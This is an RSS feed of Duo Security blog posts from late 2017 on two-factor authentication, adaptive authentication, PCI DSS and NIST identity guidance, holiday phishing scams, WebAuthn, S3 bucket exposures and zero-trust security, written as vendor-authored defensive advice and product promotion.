<![CDATA[The Current State of Consumer Security Hygiene]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/the-current-state-of-consumer-security-hygiene https://duo.com/blog/the-current-state-of-consumer-security-hygiene Industry News Thu, 04 Jan 2018 01:00:00 -0500

Consumers need to work on their basic security hygiene, according to a Tenable consumer survey of 2,196 U.S. adults and their personal security practices. Generally, they found that the majority are lacking in their security habits - most don't use two-factor authentication (2FA) and some are not updating their devices in a timely manner. However, nearly all (94%) have heard news stories about security breaches in the last year.

But why should businesses care? Consumers are also employees that are increasingly using their own personal devices to access work applications, data and other resources in order to work flexible hours and from locations outside of the traditional workplace. A lapse in their personal security habits can potentially have a ripple or direct effect on corporate security.

A few of the interesting statistics about consumer security habits from their survey include:

  • 25% of participants have implemented two-factor authentication on their devices to protect personal information in the past year (which is closely aligned with Duo Labs’ survey finding of only 28% of Americans that use 2FA in their State of the Auth report)
  • 68% avoid opening links and attachments from unsolicited emails or texts
  • 53% of Americans use a password to lock their computer and 45% use a PIN passcode to lock their mobile devices
  • 19% have implemented biometric authentication on their devices in the past year, despite Apple introducing Touch ID in 2013 and facial recognition technology more recently
  • 14% of smartphone users wait more than week (or never) to update apps on their smartphone, and another 13% of computer users wait more than a week to update - as well as 5% that don’t update computer apps at all

These habits all center around authentication, access security and device/endpoint security. As network security shifts from a perimeter-based approach to the more challenging user and endpoint-focused approach, consumer and enterprise security must also follow.

For consumers, they should turn on 2FA everywhere it’s offered and available for implementation - Twitter recently offered the use of third-party authentication apps to generate passcodes (generally considered more secure than SMS) for login verification. Some online banking websites offer advanced authentication, while major online shopping services like Amazon also offer 2FA. iCloud users can and should turn on 2FA to protect access to their device data and cloud backups.

Enterprises can step up access security by enabling more stringent controls for access to more business-critical or sensitive applications and data - for example, requiring the 2FA method of push notifications or a U2F security key for access to applications that house HR or financial data. Identifying and applying different security policies for corporate-owned vs. personal devices can also help reduce risks introduced to company resources.

Another example of an enterprise access security policy is the requirement for a PIN or password on your employee’s personal device - a security basic that only about half of the survey respondents currently practice.

When it comes to updating apps, mobile devices and computers, it’s important to run it as soon as an update becomes available - within 24 hours of receiving a notification. Enterprises can set another endpoint policy to require users to be running the latest version of a browser, plugin or application before granting them access to company resources/networks.

Get the basics behind this policy-driven security model, including:

  • Identifying corporate vs. personal devices
  • Easily deploying device certificates
  • Blocking untrusted endpoints
  • Giving users secure access to internal applications

Download Moving Beyond the Perimeter: Part 1 for a primer on the theory, and then read Moving Beyond the Perimeter: Part 2 for technical specifics on how to implement a new enterprise architecture to address new risks beyond the perimeter.

]]>
<![CDATA[Managing Risk With Adaptive Authentication]]> wnather@duo.com(Wendy Nather) https://duo.com/blog/managing-risk-with-adaptive-authentication https://duo.com/blog/managing-risk-with-adaptive-authentication Industry News Wed, 03 Jan 2018 08:30:00 -0500

The problem with authentication is that one factor doesn’t fit all — in fact, it hardly fits anything anymore. With a password being guessable and reusable, it’s a weak security control that can be attacked at scale. Adding a second factor to the mix bolsters that control, but it also starts adding friction to the login experience. CISOs now have to balance managing risk with multiple authentication factors against usability, and that’s where adaptive authentication comes in.

If you think of authentication factors as being like a hand of cards, you can play the cards that you think are appropriate at each point in your game. The most common factors are:

  • Something you know (such as a password, or something in your personal history, or a shared secret)
  • Something you have (a token, card, certificate, key, app instance, or other unique item)
  • Something you are (a fingerprint, a typing behavior, a retinal pattern, a voiceprint)

There’s also the option to allow more than one factor in each category. Theoretically, it should be harder for an attacker to compromise an account as the factors get piled on. This is why challenge questions may be as few as one and as many as five, depending on how likely they are to be guessable. The “thing you have” may consist of a mobile phone, a certificate, a voice line, a U2F token, a set of offline codes, or all of the above.

To get even more factors into the mix, you can lay down additional restrictions in your policies, such as permitted network address ranges, device hygiene levels, allowed or blocked geographic locations, corporate-managed endpoints, expected usage hours in a day, and baselined behavior.

You can use anything that reassures you that this is probably the same user you enrolled, or that excludes anything you don’t expect ever to see. For example, if you don’t expect your users to connect from outside of North America, you can reduce your potential attack surface by blocking access from everywhere else. (But be ready to manage exceptions to that rule, because for each policy, there will be an equal and opposite exception).

Note, however: if you rely too much on location as a factor, then you fall into the perimeter trap that has affected so many enterprises, where an attacker has free rein on an internal network once they’re past the firewall.

When you have reason to doubt one of the factors — is someone else replaying that password? Did someone steal the phone? — then you lean more heavily on another factor to compensate. You ask for some additional secret information, or you ask the user to produce a fingerprint. By juggling different factors to rebalance the risk, you’re employing adaptive authentication: adapting to the current estimated level of risk at the time of login.

Which cards you play might depend on whether it’s early or late in the game, what cards have already been played, or what you think the house is holding. Is this a new device? Ask the user to enroll it, providing more shared-secret factors such as a code that the help desk gives them over the phone, or by sending a confirmation to the old device, or by having the user authenticate to a different application first. With adaptive authentication, you’ve developed a strategy for each circumstance, or use case, to match the risk level you assume.

Because usability comes into play, there are also several reasons why you might adapt your authentication factors. A user currently in an area with little-to-no cell coverage might have to fall back on Wi-Fi or a token; it’s hard to use a fingerprint reader when you’re having tacos or ribs for lunch.

As mentioned above, more factors mean more friction, so another popular feature in many systems allows you to “remember” a user or a device and stop asking for the additional authentication factor over a period of time (say, a multi-hour session, or calendar days or weeks). Again, by adding or removing the requirement for certain factors under different circumstances, you can adapt the cards you play or keep. You need to keep your users happy and, at the same time, protect against the most likely threats.

Adaptive authentication helps you choose the right tools for the job at the time, without locking you and the user into one set of factors for everything. By taking advantage of flexibility, understanding the risk with different workflows and circumstances, and reducing friction in the login process for your users, you can achieve the right balance of controls. Knowing when to hold ‘em and when to fold ‘em is an important part of your dynamic security program.

]]>
<![CDATA[Using Duo's MFA to Protect Remote Access for PCI DSS Compliance]]> ubarman@duosecurity.com(Umang Barman) https://duo.com/blog/using-duos-mfa-to-protect-remote-access-for-pci-dss-compliance https://duo.com/blog/using-duos-mfa-to-protect-remote-access-for-pci-dss-compliance Industry News Tue, 19 Dec 2017 08:30:00 -0500

The Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards established to secure credit card data. At this time, PCI DSS is in its third revision with the latest version 3.2 published in 2016. All organizations that are required to be PCI compliant will need to meet all updated requirements in v3.2. The specific multi-factor authentication (MFA) requirements in PCI v3.2 will go into enforcement starting Feb 1, 2018.

In v3.2, PCI DSS put a greater emphasis on the use of multi-factor authentication as a security control to tackle data breaches due to stolen credentials. For example, in previous revisions, MFA was a required control for admin console access only into the cardholder environment (CDE).

In its latest revision, PCI extends MFA as a required control for all remote access (console and non-console) into the cardholder environment. Remote access application examples include virtual private network (VPN), virtual desktop infrastructure (VDI), remote desktop (RDP), Secure Shell (SSH) etc. In addition, PCI also published several supporting documents to help organizations deploy MFA in a compliant manner.

Organizations that need to meet PCI requirements can refer to official documents; however, official requirements can be nuanced and open to interpretation. At Duo, several of our customers asked us for clarifications regarding PCI requirements. In order to address their concerns, Duo engaged with Payments Security Compliance (PSC) part of NCC group to write a white paper that describes how MFA requirements can be implemented in a compliant manner.

PSC helps thousands of organizations, guiding them through PCI compliance requirements. The white paper is written by Paul Guthrie, who has deep experience in the PCI domain. Paul has over 20 years of payments and security expertise, and is a practicing Qualified Security Assessor (QSA) with over 200 Level 1 assessments completed.

PSC evaluated Duo against the existing PCI requirements in v3.2 and found Duo is able to meet all of its MFA requirements. In addition, this white paper also describes best practices and scenarios to implement MFA in your PCI environment to both meet compliance and ensure remote access to your network is secured. If you want to get access to the white paper, please get in touch with your account executive.

If you are interested in deploying MFA to help meet PCI requirements, you can start your free 30-day Duo trial by visiting signup.duo.com.

]]>
<![CDATA[Future-Proofing the Healthcare Security Model]]> dcopley@duo.com(Doug Copley) https://duo.com/blog/future-proofing-the-healthcare-security-model https://duo.com/blog/future-proofing-the-healthcare-security-model Industry News Mon, 18 Dec 2017 08:30:00 -0500

Challenges of Securing Healthcare

Challenges today come in all shapes and sizes. The threat landscape in 2017 is vastly different than it was just 10 years ago. Technology capabilities, the workforce and speed to market are also vastly different than they were 10 years ago. So why do so many healthcare organizations approach protecting their critical assets the same way they did in 2007?

Sure, healthcare environments are challenging to secure. Rapid business changes and expectations of convenience are often at odds with efforts to manage risk and compliance. With so many data breaches occurring today and the high percentage of them leveraging compromised credentials or compromised devices, the time to change the healthcare information security model is now.

A New Approach to Enterprise Security

Many have heard Google explain their BeyondCorp security model which effectively turned their security model on its end. Google’s decision to treat all networks as untrusted drove their strategy to one of providing secure pathways to their critical assets and establishing user trust and device trust on every application access attempt. But many view Google as having effectively unlimited resources, so what’s the right path for “typical” companies with limited resources?

Does a zero-trust model even make sense in healthcare? What would it look like? Would it drive better security, enable reductions in risk and drive operational efficiency in such a challenging environment?

Transforming Healthcare Information Security

Download Duo’s white paper, Transforming Healthcare Information Security, to understand the answers to these security strategy questions and learn how to reach the positive business outcomes that will keep healthcare organizations nimble and relevant. In this white paper, you’ll learn how you can:

  • Enable workforce members to work from any location
  • Provide flexibility to leverage company-issued technology or enable the secure use of BYOD
  • Drive meaningful visibility into security risks with fewer security tools, making security staff more productive
  • Raise end user satisfaction with security tools they actually enjoy using
  • Minimize legacy infrastructure spend and dependencies
  • Secure new business applications in hours, not weeks or months; enabling departments to move faster and drive better patient outcomes

Challenges left alone turn into roadblocks. Challenges addressed with effective strategy and innovation can positively transform your business. Download the white paper, Transforming Healthcare Information Security and see how healthcare organizations can drive business agility and improve the value of their security program by adopting a zero-trust security model.

]]>
<![CDATA[NIST Updates to Identity Management: Evolved MFA for the Masses]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/nist-updates-to-identity-management-evolved-mfa-for-the-masses https://duo.com/blog/nist-updates-to-identity-management-evolved-mfa-for-the-masses Industry News Tue, 12 Dec 2017 08:30:00 -0500

Recently, NIST published their second draft of the proposed update to the Framework for Improving Critical Infrastructure Cybersecurity, version 1.1. NIST also published a draft version 1.1 of their Roadmap for Improving Critical Infrastructure Cybersecurity, which includes updates on the following new topics:

  • Cyber-Attack Lifecycle;
  • Measuring Cybersecurity;
  • Referencing Techniques;
  • Small Business Awareness and Resources; and
  • Governance and Enterprise Risk Management.

One key part of the changes made in the Roadmap document is the renaming of the topic Authentication to Identity Management “to account for a broader range of important technical topics including authorization and identity proofing.”

Since the first release of the Framework, there have been advancements in Identity Management solutions, as outlined in section 4.7 of the Roadmap. NIST points to new multi-factor authentication (MFA) solutions and authentication protocols as examples of industry maturation, such as those established by Fast IDentity Online (FIDO) and the World Wide Consortium (W3C).

FIDO’s open authentication standard, Universal 2nd Factor (U2F) uses public key cryptography to securely authenticate a user to a web service, protecting against phishing and providing strong user-centric privacy, as a U2F device is not bound to a user’s real identity - read more about it in Bringing U2F to the Masses.

This second factor comes in the form of a U2F-compliant security key (like Yubikey Neo), a small USB device plugged into your laptop that you tap to complete two-factor authentication. See how it works below:

 

Specifically, NIST emphasizes how these protocols and solutions “will bring easy-to-use and cost-effective MFA solutions to the consumer masses, with support by nearly every major browser and mobile manufacturer.”

While use and adoption is advancing in the right direction, it’s still not enough to protect against cybersecurity threats - NIST cited the 2017 Verizon Data Breach Report’s statistic of 81 percent of hacking-related breaches that leveraged either stolen and/or weak passwords as an example of this.

To help better align technology and risk management processes, and provide guidance on digital identity guidelines, NIST has updated its Special Publication 800-63 suite of documents this past July. Get an overview of those substantial updates in Key Updates to NIST’s Digital Identity Guidelines: SP 800-63-3.

As threats and risks continue to evolve, a static approach to identity no longer suffices. Identity management needs to become more risk-aligned, adaptive, and contextual with guidance capable of supporting flexibility, modularity, and agility – while never sacrificing personal privacy to achieve better outcomes. - NIST

More contextual and adaptive identity management means more than just MFA alone - a more holistic enterprise security solution was developed by Google to ensure zero trust within their internal networks, and to address threats that exist beyond traditional perimeter protections.

That model is known as BeyondCorp, and is based on verifying the trust of both users and devices before granting access to enterprise applications and data.

While it does take a lot of effort to establish a new security framework, Duo Beyond has packaged the main components of BeyondCorp and made it easy for organizations to adopt:

  • Enroll your users and endpoints (devices like laptops, smartphones, PCs, etc.) into inventories
  • Identify endpoints as trusted using digital certificates
  • Create access policies based on the authenticated combination of user and endpoint

Duo Beyond/BeyondCorp Steps

And more - learn about how to implement BeyondCorp principles in your organization by reading the white paper, Moving Beyond the Perimeter: Part 2.

]]>
<![CDATA[Developing a Solution to Dynamic Binning for Security Reports]]> jdoppke@duo.com(Jeff Doppke) https://duo.com/blog/developing-a-solution-to-dynamic-binning-for-security-reports https://duo.com/blog/developing-a-solution-to-dynamic-binning-for-security-reports Engineering Mon, 11 Dec 2017 08:30:00 -0500

While developing Duo’s new reporting features, we wanted to make it easier for our customers to visualize authentications over time. This visualization allows customers to see trends over time and spot troublesome or suspicious authentications.

Authentication Visualization

The visualization we use is a basic histogram showing the number of authentications in a given time period. When displaying the last 24 hours of authentications, we show ~96, 15-minute wide bins that contain the authentications that fall within each of those bins.

The Requirements

The visualization started out with a finite set of relative time ranges (e.g. the last 24 hours or 7 days). Eventually, the interface evolved to allow users to specify custom time ranges.

There were several interesting challenges that arose with custom time ranges, specifically around how the data should be visualized and binned.

In short, here are the requirements:

  • Display as close to 90 bins as possible for any given time range. Knowing this, it is pretty simple to figure out the exact interval size (time_range/90=interval_size), but it’s with the following restraints where things can get a little tricky.
  • Round the beginning and end of the specified time range to the calculated interval. For example, if the user specified their start time at 1:47am and the auto-calculated interval was a 15-minute interval, round the start time down to 1:45am. The same is true for the ending time.
  • The interval that we calculated for any time range must be a valid interval for our backend storage system.
  • Control over the possible intervals in order to correctly render the x-axis.

With these requirements, there are three values we need to calculate from a start and end time:

  • The interval (15 minutes, 30 minutes, 1 hour, etc.) to bin the data
  • The rounded beginning time, rounded down to the nearest interval block.
  • The rounded end time, rounded up to the nearest interval block.

Let’s dive into how we tackled this issue!

Approaching the Problem

When developing the solution, it made sense to do so in an environment that I was comfortable in and that had a quick feedback loop. Being a frontend developer, this meant using JavaScript and D3.js. So, I put together a visual scaffolding to better help me build out and test my solution against a wide variety of time ranges and inputs. Here are a few examples:

Absolute Date and Time Inputs

Absolute Date and Time

Since we wanted to accept any range of time input between 24 hours and 180 days, I used range inputs that mapped to timestamps and listened to event changes on those inputs. This allowed me to quickly and easily change and test a wide variety of time ranges.

Visualizing Possible Bin Sizes

Visualizing Bin Sizes

As mentioned earlier, we have specific interval sizes we want to display. I calculate the raw interval based on the time range, but need to map this to an interval that we can pass to our datastore. The visualization above helped me see which two intervals I was choosing between as I changed the time range. In this case, the blue dot is the raw calculated bin size (time_range/90=interval_size) and the black dots are the possible intervals that our raw interval falls between.

Closest to 90 Wins

Closest to 90

Knowing which two possible intervals I can choose from, I compare the bin count for the lower interval and the upper interval and check the difference from our desired bin count of 90. We pick whichever one is closer to 90 bins. You can see the highlighted bar change based on what which interval is closer to our target bin count.

Seeing is Believing

Seeing is Believing

To double-check my outputs from the script, I plot the calculated bins on a timeline as we would in the product. Seeing this visually helps validate that I’m on the right track.

Conclusion

Here is a full animation of the scaffolding working as I developed it.

Conclusion

Seeing the output in real-time allowed me to test a wide range of inputs quickly and easily. Once this script was finalized, it was then easily ported to Python so we could use it on our backend. This allows customers to specify arbitrary time ranges (including the relative time ranges) and view an easy-to-digest visualization of authentication over time.

This is a good example of how it can be helpful to break down a problem and approach it from a different perspective before directly coding up a solution. Having a scaffolding to interact with made this problem and solution easier to reason about and understand.

]]>
<![CDATA[The Digital Transformation Mandate]]> dcopley@duo.com(Doug Copley) https://duo.com/blog/the-digital-transformation-mandate https://duo.com/blog/the-digital-transformation-mandate Industry News Thu, 07 Dec 2017 08:30:00 -0500

According to Oracle, the number one strategic priority for CIOs is to “Lead your company’s digital transformation, don’t just facilitate it.”

We live in the information age today, and as capabilities evolve with advances in technology, communication channels and collaboration, innovation and speed are critical. Organizations are driven by consumerization and the need to put relevant data and information decisions in the hands of consumers in real time.

A hundred years ago, inventors leveraged capability from the industrial revolution to create automobiles from raw iron, wood and rubber. In today’s information age, entrepreneurs use a new set of building blocks to deliver value: information, infrastructure as a service (IaaS), micro services and open APIs that can deliver capability continuously whenever and wherever it is needed. For consumers:

  • No need to buy a newspaper - news comes to you in real time via smartphone or email
  • No need to develop a photo and mail it - it’s on social media in minutes
  • No need for a Wealth Advisor; a robo-adviser is waiting to provide you with guidance
  • No need to go to the store - you can shop without even logging on to a computer with voice recognition technology in your home
  • If you actually go to the store, ads and coupons pop up on your phone as you enter

Digital transformation is an evolution of business and organizational models to focus on fully leveraging evolving data analytics and pervasive technologies to deliver capabilities where and how the customer can best realize value.

An effective digital transformation can significantly improve a company’s speed to market and improve user productivity while delivering enhanced customer value. A digital transformation strategy doesn’t start with the end in mind; it’s a strategy that assumes continuous innovation and adaptation of products, services and delivery channels.

For new companies, the barrier to entry is very low as infrastructure as a service (IaaS) and platforms as a service (PaaS) enable very rapid deployment of new capabilities in the cloud. For those in a CISO or similar role, enabling your organization’s adoption of new business models and new technologies is the new norm, and is a base requirement for your role.

So what can CISOs do to enable their organizations to leverage the latest technology and business models of today? Invest in security platforms that are highly flexible and scalable. To compete today, collaboration needs to happen in real time from across the globe, and with individuals that may or may not be part of your organization. Security in such a fast-paced, innovative environment needs to just work, without substantial overhead and without user friction. Security solutions that interfere with rapid business development will be eliminated.

What are the properties of such security solutions? Here are some core required capabilities that will help enable your organization to innovate and be a leader, not a laggard.

  1. Cloud First - As rapid advances are more often cloud-based, your security platforms should be cloud-native.
  2. Integration - Delivering new capability is all about the integration of ideas, applications and data platforms that work from any device, anywhere in the world. Your security platforms need to be able to protect any application, anywhere, and feed intelligence to existing tools.
  3. Speed - With the barrier to entry being so low for new startups, time to market is more important than ever, so security solutions need to be able to move at the speed of business. Protecting a new SaaS application should take minutes, not weeks or months.
  4. Faster Value from Mergers and Acquisitions (M&A) - As organizations acquire new entities, how quickly the capabilities of those entities are leveraged by the acquirer often determines the perceived success or failure of that effort in the marketplace. Security tools should help drive faster value from M&A and not get in the way of realizing the desired benefits.
  5. Lower Cost - CISOs can’t afford to add solutions that increase demands on their staff or drive up cost for the organization. Security solutions need to be easy to adopt by users, and easy to manage by security teams. Tools that can’t lower TCO won’t survive.

“In the long history of humankind, those who learned to collaborate and improvise most effectively have prevailed.” - Charles Darwin

To survive and succeed in the age of information, organizations need to adapt faster than ever before and they need security and privacy platforms that can protect at the speed of business. CISOs, give your business leaders the gift of speed. Enable the rapid digital transformations necessary for business innovation and success with a security platform that moves as fast as they do.

]]>
<![CDATA[Holiday Phishing Campaigns Target PayPal & Amazon Customers]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/holiday-phishing-campaigns-target-paypal-and-amazon-customers https://duo.com/blog/holiday-phishing-campaigns-target-paypal-and-amazon-customers Industry News Tue, 05 Dec 2017 00:00:00 -0500

During this time of the year, holiday shopping can mean it’s harder for people to keep track of their online transactions and accounts - a disordered state of being that criminals are taking advantage of through phishing campaigns that target popular payment and ecommerce websites.

PayPal Phishing Campaign

A new phishing campaign has been recently found to target consumers via PayPal. The PayPal phishing email plays on the emotions of targets, creating a false sense of urgency by claiming that your recent transaction cannot be verified, as reported by MalwareBytes.

The email message claims to confirm that the user has changed their password, and that they notice some changes to their selling activities that will require information verification. Once a user clicks on the link, they're led to a spoofed PayPal website, titled "Resolution Center" that asks for personal information, credit card numbers and extensive banking information.

Verify ID on PayPal Source: HackRead

The scam goes even further, asking the user to upload documents to verify their identity, including a passport, identity card or driver’s license, according to HackRead. If you’re giving that much information away, it’ll be much harder to detect identity fraud right away - compared to a stolen credit card number, which can be potentially flagged and stopped by your bank.

If you're on Chrome, Google has already flagged the fake login link used in this scam as a potentially dangerous site. Check the browser address bar for the verified green signature (lock icon) to ensure the page is legitimate.

PayPal provides information on phishing and suspicious emails, and a way for people to report suspected fraud on their website.

Amazon Phishing Campaign

In November, the Better Business Bureau reported on a phishing scam that impersonated Amazon.com. The message claimed that they could not confirm the address associated with your Amazon account.

Amazon Scam Source: BBB

The message also stated that Amazon had disabled login access, and required action from the user to verify account information and re-enable access to their account - urging the user to click on the link in the email, which doesn’t lead to Amazon.com but rather a third-party site that could be hosting malware.

Amazon provides a security and privacy page on identifying emails or webpages from Amazon, as well as providing an email address to report suspicious URLs or emails - stop-spoofing@amazon.com. Check out the page linked above for instructions on how to do so.

Yet, another Amazon phishing scam as reported on Twitter was spotted urging customers to call into tech support:

What to Look Out For

Slow down and pay attention to email messages to avoid clicking on or giving away sensitive information. Beware of any urgent calls to action related to your transactions or account information - this type of messaging plays on the reactive emotional response of a user to get information from them quickly.

Don’t click on links within the email - type the website URL into your address bar manually or use a search engine to locate the webpage. Check for https:// and a verified lock icon in your address bar (but don’t use this as the single indicator of security, as this doesn’t always mean 100% assurance, as new phishing tactics from this summer have found).

Protecting Against Account Breaches and Malware

Aside from what to look out for, you can proactively protect against account breaches caused by phishing attempts by turning on two-factor authentication (also sometimes referred to as ‘two-step verification,’ ‘multi-factor authentication’ or ‘2FA’ for short) for all of your online accounts, especially any tied to your financial or personal information.

A second factor of authentication (preferably via an authentication method that isn’t SMS-based, if that’s an option) can stop criminals from logging into your account remotely using only a stolen password. Check out How to Add Two-Factor Authentication to Your Amazon Account With Duo Mobile.

In addition to protecting against unauthorized logins from stolen passwords, you can potentially better protect your devices against malware infection caused by clicking on links and visiting malicious websites by keeping your software up to date - that means running operating system, browser, plugin and other application updates as soon as they’re available. The more up to date your system is, the less likely it is you will be compromised by malware that seeks out weaknesses in old software to exploit.

]]>
<![CDATA[Web Authentication: What It Is and What It Means for Passwords]]> nsteele@duo.com(Nick Steele) https://duo.com/blog/web-authentication-what-it-is-and-what-it-means-for-passwords https://duo.com/blog/web-authentication-what-it-is-and-what-it-means-for-passwords Engineering Fri, 01 Dec 2017 08:30:00 -0500

Since mid 2016, a group of security professionals and researchers from across the industry have been working on a new way to handle authentication and proving one’s identity on the internet without the help of passwords.

WebAuthn and UAF

The new standard known as Web Authentication, or WebAuthn for short, is a credential management API that will be built directly into popular web browsers. It allows users to register and authenticate with web applications using an authenticator such as a phone, hardware security keys, or TPM (Trusted Platform Module) devices.

This means with devices like a phone or a TPM, where a user can provide us with biometric verification, we can use WebAuthn to replace traditional passwords. Aside from user verification, we can also confirm ‘user presence.’ So if users have a U2F token like a Yubikey, we can handle that second factor of authentication through WebAuthn API as well.

While WebAuthn is a fairly new spec, it is heavily based on a relatively old one, at least in “Internet years.” The FIDO Alliance began working on a similar API Standard in 2014 called UAF, Universal Authentication Factor. The specification for UAF fell short in some ways: It seems like there was never a real push to have the necessary functionality added to major browsers, so developers that wanted to implement it were tasked with working around that lack of native support.

On top of that, there was little reference for how to implement the steps to make UAF work properly on Android and iOS devices. At the time of publication, the best practical UAF reference was this implementation open-sourced by eBay.

Unlike its predecessor, WebAuthn should be here to stay. Although the fine points of the spec are complex, WebAuthn has been fairly easy to implement in practice. At the time of writing this, both Chrome and Firefox have the data types necessary for WebAuthn, and Firefox’s Nightly Build is able to create and request credentials. We’ll talk a bit later on about what this new standard could mean for the future of passwords (sorry, they’re probably not going away tomorrow), but first, a bit more about the core components of the WebAuthn API.

Registration and Authentication

While WebAuthn is drafted to be an open-ended credential creation and management API capable of making many different types of credentials, right now, it is written to handle registration and authentication to a web application. The credentials created through the WebAuthn API rely on strong cryptographic principles and asymmetric encryption. So when we talk about credential registration and authentication, know that the credentials we are using are actually public and private key pairs.

Registration

During registration, a user is creating a credential with an authenticator and then proving to the web application’s owner, called the relying party, that the credential and authenticator used to create it are trustworthy. Proving this allows the relying party to use the credential created in lieu of a conventional password in cases where there is user verification, and as a replacement for conventional U2F in cases where we can only prove user presence.

There are more than a few different cases for how WebAuthn would work in practice, but the most common example is this: A user visits a website, let’s say cat-facts.com, on their laptop and goes to register an account. After pressing a button to begin registration on the site, they receive a prompt on their phone saying “Register with cat-facts.com.”

Once they’ve accepted the request, the user would be asked to perform an “authorization gesture,” such as typing in a PIN or biometric action that is associated with the account they are creating. After providing this, the website on the laptop would display something to the effect of “Registration complete!”

The user can now log in to cat-facts.com using the same phone and authorization gesture.

UAF Standards

Authentication

Authentication, also known as assertion, since we are asserting the ownership of a credential, occurs after we have registered a credential with a website. Since the credential is just a keypair, the relying party can send some data to the user to verify their identity via the user’s authenticator. If they are who they say they are, the data will return signed by the credential private key. This action, in part, authenticates the user to the relying party.

Let’s consider a different scenario for how we can use WebAuthn to handle authentication after a user has registered with the site example.com. Let’s assume they’ve registered a second account as well and, to make things more interesting, that they are browsing on their phone. The user navigates to example.com on their phone and chooses the option to login. They are shown a list of their two accounts, choose one to log in to, and then they’re prompted to enter a PIN or biometric associated with the account. After this is given, example.com logs the user into the selected account.

Security Concerns

Most security issues lie with the implementation of the WebAuthn spec by developers. If a developer doesn’t take into account checking for things like replay attacks or making sure that the authenticator hasn’t been compromised in some way, then attacks are possible. Most concerns regarding the authenticator and manufacturer can be mitigated by diligence on the part of the developer.

What It Means for Passwords

The big thing that WebAuthn wants to provide is biometric multi-factor authentication based on “Something a user is.” A user (in most cases) has a voice, a fingerprint, or a retina, that is unique to them. Something most users also have nowadays is a biometric device, like a smartphone, that can use this data to create and manage credentials that only the user can access through these unique traits.

Since your phone is much better at making and storing passwords than you are, we can replace the standard website password using the WebAuthn spec. It is built with this in mind as its core feature, but currently only supports the physical method of two-factor authentication (“something a user has,” like a hardware security token), since no phones currently support WebAuthn.

This is not to say either that WebAuthn cannot be used for the multi-factor authentication method of something a user knows. It can (once the specification is implemented) do that too! Take, for example, a user entering a PIN instead of a biometric to authenticate with a website. This is something a user knows, but handled via the WebAuthn spec. Unlike WebAuthn’s predecessor, FIDO UAF, the spec allows for a lot more versatility.

Also unlike FIDO UAF, there are a lot of heavyweights supporting it, including Google, Microsoft and Mozilla. This makes me hopeful that this spec will actually begin to be adopted. A good sign of these companies actively being involved in WebAuthn’s development is that the spec already explains how it will integrate with Android Key Store and Android SafetyNet, and with Google engineers contributing to the spec draft, they’ll probably add support soon.

But Google was likely thinking about this issue for a while now. In the beginning of 2017, Google began working on a specification regarding a credential manager API to handle credential storage. However, the only credentials it talks about in this version of the credential manager are password and federated credentials. Google actually released documentation on using this credential management API in Chrome, and the same API is being modified (in Chrome) to include support for WebAuthn credentials.

So don’t start deleting your passwords yet, because WebAuthn still needs a bit of work. While it looks like the WebAuthn API should be available on Firefox and Chrome in the coming months, I don’t think we’ll see it replace passwords very soon. I do hope developers and companies start to implement it as a replacement for existing two-factor authentication code they may have in their site, because when phones begin to support WebAuthn requests, it should be quick to switch over support for user verification.

Examples and Further Reading

The Duo Labs team wrote a couple proof of concepts to both teach ourselves and help others see how WebAuthn should work in practice. After receiving some very helpful advice from J.C. Jones, one of the authors of the standard, I put together a bare bones web application written in Go that demonstrates the basics of Webauthn Registration and Authentication. The code is available to try out, currently only via the Firefox Nightly Build, at webauthn.io and the source code is available on GitHub if you want to run the code locally.

I hope to have another blog post available soon with a more technical look at the spec, but in the meantime, if you’re feeling excited and ready to take a deeper dive into WebAuthn, then I encourage people to check out the W3C working draft. If you have any questions, please reach out to me on Twitter or GitHub.

]]>
<![CDATA[Protecting Against S3 Cloud Storage Leaks With a New Approach]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/protecting-against-s3-cloud-storage-leaks-with-a-new-approach https://duo.com/blog/protecting-against-s3-cloud-storage-leaks-with-a-new-approach Industry News Thu, 30 Nov 2017 00:00:00 -0500

The misconfiguration of Amazon Web Services' (AWS) S3 (Amazon Simple Storage Service) buckets is a very common yet major error that can lead to the public exposure of large volumes of often highly-sensitive (and sometimes classified) data stored in a virtual environment. This isn’t a hack - it’s an internal IT infrastructure error that can leave data unprotected and available to anyone online.

Most recently, cloud security firm UpGuard reported the unprotected data and software of a Defense Department contractor - a more technical and detailed overview of the documents can be found in their blog post. The software was for a cloud-based intelligence distribution platform known as Red Disk, developed to deliver intel to troops in the field, according to Ars Technica. It was never fully deployed.

While the files couldn't be accessed without connecting to Pentagon systems, the data found on the virtual drive was highly sensitive, some of which was classified and concerning national security. The data also included private keys and hashed passwords for access to distributed intelligence systems that belonged to the federal agency’s third-party contractor's admins, as reported by Threatpost.

While UpGuard claims the immediate solution would be to update the S3 bucket's permission settings to only allow access to authorized admins, they also question how government agencies can keep track of their data security.

But this is clearly not just an issue for the federal government - as other exposures of sensitive data online via S3 buckets have shown, affecting major mobile carriers, an entertainment company, a cable television provider, and so on. In September, I listed examples of half a dozen incidents that resulted in the exposure of cloud data in Securing Access to Data Stored in Amazon S3 Buckets.

A New Approach to Enterprise Security

These incidents demonstrate that gaining insight and control over how contractors access, maintain and house your data is essential to reduce the risk of data exposure. While this can be quite difficult for large organizations that often work either tangentially or closely with hundreds of contractors, keeping track of how sensitive (especially classified) data is accessed, and by who and what, should be first priority.

Enrolling your users and endpoints (devices like laptops, smartphones, PCs, etc.) into inventories; identifying endpoints as trusted using digital certificates and creating access policies based on the authenticated combination of user and endpoint are all steps to take in establishing a new framework for enterprise security, known as BeyondCorp.

Developed by Google, this allows an organization to enforce the same security policies, regardless of the location of the user, device or application. It's a zero-trust security model that ensures both the trust of the user and device before granting access to the applications and data. This model can also address risks posed by external, cloud-based applications that can face attacks that fall outside of traditional enterprise perimeter protections. While not a replacement for these traditional protections, it is a necessary enhancement.

Learn more about the security philosophy of BeyondCorp in Moving Beyond the Perimeter: Part 1, and how to implement the principles in your organization using Duo Beyond in Moving Beyond the Perimeter: Part 2.

]]>
<![CDATA[Examining Personal Protection Devices: Hardware and Firmware Research Methodology in Action]]> tmanning@duo.com(Todd Manning) https://duo.com/blog/examining-personal-protection-devices-hardware-and-firmware-research-methodology-in-action https://duo.com/blog/examining-personal-protection-devices-hardware-and-firmware-research-methodology-in-action Duo Labs Mon, 20 Nov 2017 08:30:00 -0500

In a technical paper released today, Duo Labs details research into two personal protection devices based on ARM Cortex M microcontrollers. Tools and techniques are shared, and a novel bypass affecting readback protection in one microcontroller is shown.

